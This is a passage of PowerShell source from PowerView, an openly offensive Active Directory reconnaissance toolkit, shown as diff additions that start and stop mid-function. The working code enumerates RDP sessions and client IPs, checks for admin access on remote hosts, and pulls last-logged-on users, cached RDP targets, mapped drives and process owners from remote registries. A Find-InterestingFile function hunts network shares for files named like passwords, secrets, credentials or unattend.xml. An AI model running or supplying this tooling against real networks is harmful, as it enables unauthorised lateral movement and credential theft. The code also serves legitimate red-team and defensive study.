$WTS_SESSION_INFO_1 + + $RDPSession = New-Object PSObject + + if ($Info.pHostName) { + $RDPSession | Add-Member Noteproperty 'ComputerName' $Info.pHostName + } + else { + # if no hostname returned, use the specified hostname + $RDPSession | Add-Member Noteproperty 'ComputerName' $Computer + } + + $RDPSession | Add-Member Noteproperty 'SessionName' $Info.pSessionName + + if ($(-not $Info.pDomainName) -or ($Info.pDomainName -eq '')) { + # if a domain isn't returned just use the username + $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pUserName)" + } + else { + $RDPSession | Add-Member Noteproperty 'UserName' "$($Info.pDomainName)\$($Info.pUserName)" + } + + $RDPSession | Add-Member Noteproperty 'ID' $Info.SessionID + $RDPSession | Add-Member Noteproperty 'State' $Info.State + + $ppBuffer = [IntPtr]::Zero + $pBytesReturned = 0 + + # query for the source client IP with WTSQuerySessionInformation + # https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx + $Result2 = $Wtsapi32::WTSQuerySessionInformation($Handle, $Info.SessionID, 14, [ref]$ppBuffer, [ref]$pBytesReturned);$LastError2 = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Result2 -eq 0) { + Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError2).Message)" + } + else { + $Offset2 = $ppBuffer.ToInt64() + $NewIntPtr2 = New-Object System.Intptr -ArgumentList $Offset2 + $Info2 = $NewIntPtr2 -as $WTS_CLIENT_ADDRESS + + $SourceIP = $Info2.Address + if ($SourceIP[2] -ne 0) { + $SourceIP = [String]$SourceIP[2]+'.'+[String]$SourceIP[3]+'.'+[String]$SourceIP[4]+'.'+[String]$SourceIP[5] + } + else { + $SourceIP = $Null + } + + $RDPSession | Add-Member Noteproperty 'SourceIP' $SourceIP + $RDPSession.PSObject.TypeNames.Insert(0, 'PowerView.RDPSessionInfo') + $RDPSession + + # free up the memory buffer + $Null = $Wtsapi32::WTSFreeMemory($ppBuffer) + + $Offset += $Increment + } + } + # free up the memory result buffer + $Null = $Wtsapi32::WTSFreeMemoryEx(2, $ppSessionInfo, $pCount) + } + else { + Write-Verbose "[Get-NetRDPSession] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + # close off the service handle + $Null = $Wtsapi32::WTSCloseServer($Handle) + } + else { + Write-Verbose "[Get-NetRDPSession] Error opening the Remote Desktop Session Host (RD Session Host) server for: $ComputerName" + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Test-AdminAccess { +<# +.SYNOPSIS + +Tests if the current user has administrative access to the local (or a remote) machine. + +Idea stolen from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" ' + 'Thomas McCarthy "smilingraccoon" ' + 'Royce Davis "r3dy" ' + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will use the OpenSCManagerW Win32API call to establish +a handle to the remote host. If this succeeds, the current user context +has local administrator acess to the target. + +.PARAMETER ComputerName + +Specifies the hostname to check for local admin access (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Test-AdminAccess -ComputerName sqlserver + +Returns results indicating whether the current user has admin access to the 'sqlserver' host. + +.EXAMPLE + +Get-DomainComputer | Test-AdminAccess + +Returns what machines in the domain the current user has access to. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Test-AdminAccess -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.AdminAccess + +A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether +the current user has local admin rights, along with the ComputerName added. + +.LINK + +https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ +#> + + [OutputType('PowerView.AdminAccess')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # 0xF003F - SC_MANAGER_ALL_ACCESS + # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx + $Handle = $Advapi32::OpenSCManagerW("\\$Computer", 'ServicesActive', 0xF003F);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + $IsAdmin = New-Object PSObject + $IsAdmin | Add-Member Noteproperty 'ComputerName' $Computer + + # if we get a non-zero handle back, everything was successful + if ($Handle -ne 0) { + $Null = $Advapi32::CloseServiceHandle($Handle) + $IsAdmin | Add-Member Noteproperty 'IsAdmin' $True + } + else { + Write-Verbose "[Test-AdminAccess] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + $IsAdmin | Add-Member Noteproperty 'IsAdmin' $False + } + $IsAdmin.PSObject.TypeNames.Insert(0, 'PowerView.AdminAccess') + $IsAdmin + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetComputerSiteName { +<# +.SYNOPSIS + +Returns the AD site where the local (or a remote) machine resides. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will use the DsGetSiteName Win32API call to look up the +name of the site where a specified computer resides. + +.PARAMETER ComputerName + +Specifies the hostname to check the site for (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local + +Returns the site for WINDOWS1.testlab.local. + +.EXAMPLE + +Get-DomainComputer | Get-NetComputerSiteName + +Returns the sites for every machine in AD. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred + +.OUTPUTS + +PowerView.ComputerSite + +A PSCustomObject containing the ComputerName, IPAddress, and associated Site name. +#> + + [OutputType('PowerView.ComputerSite')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # if we get an IP address, try to resolve the IP to a hostname + if ($Computer -match '^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') { + $IPAddress = $Computer + $Computer = [System.Net.Dns]::GetHostByAddress($Computer) | Select-Object -ExpandProperty HostName + } + else { + $IPAddress = @(Resolve-IPAddress -ComputerName $Computer)[0].IPAddress + } + + $PtrInfo = [IntPtr]::Zero + + $Result = $Netapi32::DsGetSiteName($Computer, [ref]$PtrInfo) + + $ComputerSite = New-Object PSObject + $ComputerSite | Add-Member Noteproperty 'ComputerName' $Computer + $ComputerSite | Add-Member Noteproperty 'IPAddress' $IPAddress + + if ($Result -eq 0) { + $Sitename = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($PtrInfo) + $ComputerSite | Add-Member Noteproperty 'SiteName' $Sitename + } + else { + Write-Verbose "[Get-NetComputerSiteName] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + $ComputerSite | Add-Member Noteproperty 'SiteName' '' + } + $ComputerSite.PSObject.TypeNames.Insert(0, 'PowerView.ComputerSite') + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + + $ComputerSite + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-WMIRegProxy { +<# +.SYNOPSIS + +Enumerates the proxy server and WPAD conents for the current user. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Enumerates the proxy server and WPAD specification for the current user +on the local machine (default), or a machine specified with -ComputerName. +It does this by enumerating settings from +HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings. + +.PARAMETER ComputerName + +Specifies the system to enumerate proxy settings on. Defaults to the local host. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connecting to the remote system. + +.EXAMPLE + +Get-WMIRegProxy + +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +WINDOWS1 http://primary.test... + +.EXAMPLE + +$Cred = Get-Credential "TESTLAB\administrator" +Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local + +ComputerName ProxyServer AutoConfigURL Wpad +------------ ----------- ------------- ---- +windows1.testlab.local primary.testlab.local + +.INPUTS + +String + +Accepts one or more computer name specification strings on the pipeline (netbios or FQDN). + +.OUTPUTS + +PowerView.ProxySettings + +Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents. +#> + + [OutputType('PowerView.ProxySettings')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + ForEach ($Computer in $ComputerName) { + try { + $WmiArguments = @{ + 'List' = $True + 'Class' = 'StdRegProv' + 'Namespace' = 'root\default' + 'Computername' = $Computer + 'ErrorAction' = 'Stop' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } + + $RegProvider = Get-WmiObject @WmiArguments + $Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings' + + # HKEY_CURRENT_USER + $HKCU = 2147483649 + $ProxyServer = $RegProvider.GetStringValue($HKCU, $Key, 'ProxyServer').sValue + $AutoConfigURL = $RegProvider.GetStringValue($HKCU, $Key, 'AutoConfigURL').sValue + + $Wpad = '' + if ($AutoConfigURL -and ($AutoConfigURL -ne '')) { + try { + $Wpad = (New-Object Net.WebClient).DownloadString($AutoConfigURL) + } + catch { + Write-Warning "[Get-WMIRegProxy] Error connecting to AutoConfigURL : $AutoConfigURL" + } + } + + if ($ProxyServer -or $AutoConfigUrl) { + $Out = New-Object PSObject + $Out | Add-Member Noteproperty 'ComputerName' $Computer + $Out | Add-Member Noteproperty 'ProxyServer' $ProxyServer + $Out | Add-Member Noteproperty 'AutoConfigURL' $AutoConfigURL + $Out | Add-Member Noteproperty 'Wpad' $Wpad + $Out.PSObject.TypeNames.Insert(0, 'PowerView.ProxySettings') + $Out + } + else { + Write-Warning "[Get-WMIRegProxy] No proxy settings found for $ComputerName" + } + } + catch { + Write-Warning "[Get-WMIRegProxy] Error enumerating proxy settings for $ComputerName : $_" + } + } + } +} + + +function Get-WMIRegLastLoggedOn { +<# +.SYNOPSIS + +Returns the last user who logged onto the local (or a remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +This function uses remote registry to enumerate the LastLoggedOnUser registry key +for the local (or remote) machine. + +.PARAMETER ComputerName + +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connecting to the remote system. + +.EXAMPLE + +Get-WMIRegLastLoggedOn + +Returns the last user logged onto the local machine. + +.EXAMPLE + +Get-WMIRegLastLoggedOn -ComputerName WINDOWS1 + +Returns the last user logged onto WINDOWS1 + +.EXAMPLE + +Get-DomainComputer | Get-WMIRegLastLoggedOn + +Returns the last user logged onto all machines in the domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred + +.OUTPUTS + +PowerView.LastLoggedOnUser + +A PSCustomObject containing the ComputerName and last loggedon user. +#> + + [OutputType('PowerView.LastLoggedOnUser')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + ForEach ($Computer in $ComputerName) { + # HKEY_LOCAL_MACHINE + $HKLM = 2147483650 + + $WmiArguments = @{ + 'List' = $True + 'Class' = 'StdRegProv' + 'Namespace' = 'root\default' + 'Computername' = $Computer + 'ErrorAction' = 'SilentlyContinue' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } + + # try to open up the remote registry key to grab the last logged on user + try { + $Reg = Get-WmiObject @WmiArguments + + $Key = 'SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI' + $Value = 'LastLoggedOnUser' + $LastUser = $Reg.GetStringValue($HKLM, $Key, $Value).sValue + + $LastLoggedOn = New-Object PSObject + $LastLoggedOn | Add-Member Noteproperty 'ComputerName' $Computer + $LastLoggedOn | Add-Member Noteproperty 'LastLoggedOn' $LastUser + $LastLoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LastLoggedOnUser') + $LastLoggedOn + } + catch { + Write-Warning "[Get-WMIRegLastLoggedOn] Error opening remote registry on $Computer. Remote registry likely not enabled." + } + } + } +} + + +function Get-WMIRegCachedRDPConnection { +<# +.SYNOPSIS + +Returns information about RDP connections outgoing from the local (or remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertFrom-SID + +.DESCRIPTION + +Uses remote registry functionality to query all entries for the +"Windows Remote Desktop Connection Client" on a machine, separated by +user and target server. + +.PARAMETER ComputerName + +Specifies the hostname to query for cached RDP connections (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connecting to the remote system. + +.EXAMPLE + +Get-WMIRegCachedRDPConnection + +Returns the RDP connection client information for the local machine. + +.EXAMPLE + +Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local + +Returns the RDP connection client information for the WINDOWS2.testlab.local machine + +.EXAMPLE + +Get-DomainComputer | Get-WMIRegCachedRDPConnection + +Returns cached RDP information for all machines in the domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred + +.OUTPUTS + +PowerView.CachedRDPConnection + +A PSCustomObject containing the ComputerName and cached RDP information. +#> + + [OutputType('PowerView.CachedRDPConnection')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + ForEach ($Computer in $ComputerName) { + # HKEY_USERS + $HKU = 2147483651 + + $WmiArguments = @{ + 'List' = $True + 'Class' = 'StdRegProv' + 'Namespace' = 'root\default' + 'Computername' = $Computer + 'ErrorAction' = 'Stop' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } + + try { + $Reg = Get-WmiObject @WmiArguments + + # extract out the SIDs of domain users in this hive + $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } + + ForEach ($UserSID in $UserSIDs) { + try { + if ($PSBoundParameters['Credential']) { + $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential + } + else { + $UserName = ConvertFrom-SID -ObjectSid $UserSID + } + + # pull out all the cached RDP connections + $ConnectionKeys = $Reg.EnumValues($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Default").sNames + + ForEach ($Connection in $ConnectionKeys) { + # make sure this key is a cached connection + if ($Connection -match 'MRU.*') { + $TargetServer = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Default", $Connection).sValue + + $FoundConnection = New-Object PSObject + $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer + $FoundConnection | Add-Member Noteproperty 'UserName' $UserName + $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID + $FoundConnection | Add-Member Noteproperty 'TargetServer' $TargetServer + $FoundConnection | Add-Member Noteproperty 'UsernameHint' $Null + $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection') + $FoundConnection + } + } + + # pull out all the cached server info with username hints + $ServerKeys = $Reg.EnumKey($HKU,"$UserSID\Software\Microsoft\Terminal Server Client\Servers").sNames + + ForEach ($Server in $ServerKeys) { + + $UsernameHint = $Reg.GetStringValue($HKU, "$UserSID\Software\Microsoft\Terminal Server Client\Servers\$Server", 'UsernameHint').sValue + + $FoundConnection = New-Object PSObject + $FoundConnection | Add-Member Noteproperty 'ComputerName' $Computer + $FoundConnection | Add-Member Noteproperty 'UserName' $UserName + $FoundConnection | Add-Member Noteproperty 'UserSID' $UserSID + $FoundConnection | Add-Member Noteproperty 'TargetServer' $Server + $FoundConnection | Add-Member Noteproperty 'UsernameHint' $UsernameHint + $FoundConnection.PSObject.TypeNames.Insert(0, 'PowerView.CachedRDPConnection') + $FoundConnection + } + } + catch { + Write-Verbose "[Get-WMIRegCachedRDPConnection] Error: $_" + } + } + } + catch { + Write-Warning "[Get-WMIRegCachedRDPConnection] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_" + } + } + } +} + + +function Get-WMIRegMountedDrive { +<# +.SYNOPSIS + +Returns information about saved network mounted drives for the local (or remote) machine. + +Note: This function requires administrative rights on the machine you're enumerating. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertFrom-SID + +.DESCRIPTION + +Uses remote registry functionality to enumerate recently mounted network drives. + +.PARAMETER ComputerName + +Specifies the hostname to query for mounted drive information (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connecting to the remote system. + +.EXAMPLE + +Get-WMIRegMountedDrive + +Returns the saved network mounted drives for the local machine. + +.EXAMPLE + +Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local + +Returns the saved network mounted drives for the WINDOWS2.testlab.local machine + +.EXAMPLE + +Get-DomainComputer | Get-WMIRegMountedDrive + +Returns the saved network mounted drives for all machines in the domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred + +.OUTPUTS + +PowerView.RegMountedDrive + +A PSCustomObject containing the ComputerName and mounted drive information. +#> + + [OutputType('PowerView.RegMountedDrive')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + ForEach ($Computer in $ComputerName) { + # HKEY_USERS + $HKU = 2147483651 + + $WmiArguments = @{ + 'List' = $True + 'Class' = 'StdRegProv' + 'Namespace' = 'root\default' + 'Computername' = $Computer + 'ErrorAction' = 'Stop' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } + + try { + $Reg = Get-WmiObject @WmiArguments + + # extract out the SIDs of domain users in this hive + $UserSIDs = ($Reg.EnumKey($HKU, '')).sNames | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } + + ForEach ($UserSID in $UserSIDs) { + try { + if ($PSBoundParameters['Credential']) { + $UserName = ConvertFrom-SID -ObjectSid $UserSID -Credential $Credential + } + else { + $UserName = ConvertFrom-SID -ObjectSid $UserSID + } + + $DriveLetters = ($Reg.EnumKey($HKU, "$UserSID\Network")).sNames + + ForEach ($DriveLetter in $DriveLetters) { + $ProviderName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'ProviderName').sValue + $RemotePath = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'RemotePath').sValue + $DriveUserName = $Reg.GetStringValue($HKU, "$UserSID\Network\$DriveLetter", 'UserName').sValue + if (-not $UserName) { $UserName = '' } + + if ($RemotePath -and ($RemotePath -ne '')) { + $MountedDrive = New-Object PSObject + $MountedDrive | Add-Member Noteproperty 'ComputerName' $Computer + $MountedDrive | Add-Member Noteproperty 'UserName' $UserName + $MountedDrive | Add-Member Noteproperty 'UserSID' $UserSID + $MountedDrive | Add-Member Noteproperty 'DriveLetter' $DriveLetter + $MountedDrive | Add-Member Noteproperty 'ProviderName' $ProviderName + $MountedDrive | Add-Member Noteproperty 'RemotePath' $RemotePath + $MountedDrive | Add-Member Noteproperty 'DriveUserName' $DriveUserName + $MountedDrive.PSObject.TypeNames.Insert(0, 'PowerView.RegMountedDrive') + $MountedDrive + } + } + } + catch { + Write-Verbose "[Get-WMIRegMountedDrive] Error: $_" + } + } + } + catch { + Write-Warning "[Get-WMIRegMountedDrive] Error accessing $Computer, likely insufficient permissions or firewall rules on host: $_" + } + } + } +} + + +function Get-WMIProcess { +<# +.SYNOPSIS + +Returns a list of processes and their owners on the local or remote machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine, +including the owners of the particular process. + +.PARAMETER ComputerName + +Specifies the hostname to query for cached RDP connections (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system. + +.EXAMPLE + +Get-WMIProcess -ComputerName WINDOWS1 + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred + +.OUTPUTS + +PowerView.UserProcess + +A PSCustomObject containing the remote process information. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.UserProcess')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + PROCESS { + ForEach ($Computer in $ComputerName) { + try { + $WmiArguments = @{ + 'ComputerName' = $ComputerName + 'Class' = 'Win32_process' + } + if ($PSBoundParameters['Credential']) { $WmiArguments['Credential'] = $Credential } + Get-WMIobject @WmiArguments | ForEach-Object { + $Owner = $_.getowner(); + $Process = New-Object PSObject + $Process | Add-Member Noteproperty 'ComputerName' $Computer + $Process | Add-Member Noteproperty 'ProcessName' $_.ProcessName + $Process | Add-Member Noteproperty 'ProcessID' $_.ProcessID + $Process | Add-Member Noteproperty 'Domain' $Owner.Domain + $Process | Add-Member Noteproperty 'User' $Owner.User + $Process.PSObject.TypeNames.Insert(0, 'PowerView.UserProcess') + $Process + } + } + catch { + Write-Verbose "[Get-WMIProcess] Error enumerating remote processes on '$Computer', access likely denied: $_" + } + } + } +} + + +function Find-InterestingFile { +<# +.SYNOPSIS + +Searches for files on the given path that match a series of specified criteria. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection + +.DESCRIPTION + +This function recursively searches a given UNC path for files with +specific keywords in the name (default of pass, sensitive, secret, admin, +login and unattend*.xml). By default, hidden files/folders are included +in search results. If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection +is used to temporarily map the remote share. + +.PARAMETER Path + +UNC/local path to recursively search. + +.PARAMETER Include + +Only return files/folders that match the specified array of strings, +i.e. @(*.doc*, *.xls*, *.ppt*) + +.PARAMETER LastAccessTime + +Only return files with a LastAccessTime greater than this date value. + +.PARAMETER LastWriteTime + +Only return files with a LastWriteTime greater than this date value. + +.PARAMETER CreationTime + +Only return files with a CreationTime greater than this date value. + +.PARAMETER OfficeDocs + +Switch. Search for office documents (*.doc*, *.xls*, *.ppt*) + +.PARAMETER FreshEXEs + +Switch. Find .EXEs accessed within the last 7 days. + +.PARAMETER ExcludeFolders + +Switch. Exclude folders from the search results. + +.PARAMETER ExcludeHidden + +Switch. Exclude hidden files and folders from the search results. + +.PARAMETER CheckWriteAccess + +Switch. Only returns files the current user has write access to. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +to connect to remote systems for file enumeration. + +.EXAMPLE + +Find-InterestingFile -Path "C:\Backup\" + +Returns any files on the local path C:\Backup\ that have the default +search term set in the title. + +.EXAMPLE + +Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7) + +Returns any files on the remote path \\WINDOWS7\Users\ that have the default +search term set in the title and were accessed within the last week. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Find-InterestingFile -Credential $Cred -Path "\\PRIMARY.testlab.local\C$\Temp\" + +.OUTPUTS + +PowerView.FoundFile +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.FoundFile')] + [CmdletBinding(DefaultParameterSetName = 'FileSpecification')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [String[]] + $Path = '.\', + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [Alias('SearchTerms', 'Terms')] + [String[]] + $Include = @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config'), + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $LastAccessTime, + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $LastWriteTime, + + [Parameter(ParameterSetName = 'FileSpecification')] + [ValidateNotNullOrEmpty()] + [DateTime] + $CreationTime, + + [Parameter(ParameterSetName = 'OfficeDocs')] + [Switch] + $OfficeDocs, + + [Parameter(ParameterSetName = 'FreshEXEs')] + [Switch] + $FreshEXEs, + + [Parameter(ParameterSetName = 'FileSpecification')] + [Switch] + $ExcludeFolders, + + [Parameter(ParameterSetName = 'FileSpecification')] + [Switch] + $ExcludeHidden, + + [Switch] + $CheckWriteAccess, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{ + 'Recurse' = $True + 'ErrorAction' = 'SilentlyContinue' + 'Include' = $Include + } + if ($PSBoundParameters['OfficeDocs']) { + $SearcherArguments['Include'] = @('*.doc', '*.docx', '*.xls', '*.xlsx', '*.ppt', '*.pptx') + } + elseif ($PSBoundParameters['FreshEXEs']) { + # find .exe's accessed within the last 7 days + $LastAccessTime = (Get-Date).AddDays(-7).ToString('MM/dd/yyyy') + $SearcherArguments['Include'] = @('*.exe') + } + $SearcherArguments['Force'] = -not $PSBoundParameters['ExcludeHidden'] + + $MappedComputers = @{} + + function Test-Write { + # short helper to check is the current user can write to a file + [CmdletBinding()]Param([String]$Path) + try { + $Filetest = [IO.File]::OpenWrite($Path) + $Filetest.Close() + $True + } + catch { + $False + } + } + } + + PROCESS { + ForEach ($TargetPath in $Path) { + if (($TargetPath -Match '\\\\.*\\.*') -and ($PSBoundParameters['Credential'])) { + $HostComputer = (New-Object System.Uri($TargetPath)).Host + if (-not $MappedComputers[$HostComputer]) { + # map IPC$ to this computer if it's not already + Add-RemoteConnection -ComputerName $HostComputer -Credential $Credential + $MappedComputers[$HostComputer] = $True + 